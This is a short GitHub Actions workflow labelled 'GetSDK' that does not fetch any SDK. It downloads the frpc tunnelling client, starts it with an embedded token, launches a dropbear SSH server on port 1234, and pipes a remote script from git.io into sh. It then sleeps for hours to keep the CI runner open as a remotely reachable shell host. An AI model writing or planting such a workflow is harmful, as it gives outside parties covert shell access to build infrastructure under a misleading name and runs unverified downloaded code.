name: GetSDK
on: 
  workflow_dispatch:
defaults:
  run:
    shell: bash

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - name: Start
      run: |
         echo 666
         #sudo docker rmi $(docker images -q)
         sudo curl https://nya.globalslb.net/natfrp/client/frpc/0.51.0-sakura-11.1/frpc_linux_amd64 >$HOME/frpc
         sudo apt install dropbear
         sudo chmod a+x $HOME/frpc
         sudo $HOME/frpc -f 68j2ggsn5l7jsxrw2rilxdr8012ksa00:21519570 &
         sudo dropbear -E -p 1234 &
         cd $HOME
         curl -sL https://git.io/file-transfer | sh
    - name: StartLoop
      run: |
        sleep 9999
        sleep 9999
